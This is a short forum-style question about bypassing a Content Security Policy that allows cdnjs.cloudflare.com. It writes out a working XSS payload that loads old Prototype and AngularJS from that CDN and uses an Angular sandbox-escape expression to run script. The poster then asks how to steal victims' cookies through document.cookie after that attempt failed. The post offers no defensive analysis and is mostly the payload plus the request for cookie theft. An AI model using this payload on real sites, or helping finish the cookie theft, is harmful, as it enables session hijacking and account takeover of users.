26Nis
Overcoming Cookie Theft Barrier in XSS Attack despite CSP Implementation
I have a website that includes CSP rules:
.use(
helmet.contentSecurityPolicy({
directives: {
defaultSrc: ["'self'"],
scriptSrc: [
"'self'",
"cdnjs.cloudflare.com"
],
},
})
)
I successfully executed an XSS attack in a input field and bypassed the CSP by:
<SCRIPT src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></SCRIPT>
<SCRIPT src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" />.
</SCRIPT>
<div ng-app ng-csp style="display:none;">
{{$on.curry.call().alert('xss')}}
</div>
However, when attempting to steal the cookie, I encountered an issue. I tried to access the cookie using document.cookie, but it didn't work as expected. Instead, I received 'undefined' when attempting to simply alert 'document'. How can I successfully steal the cookie in this scenario?"
I tried: {{$on.curry.call().alert(document.cookie)}}
but did not work. How can I successfully steal the cookie in this scenario?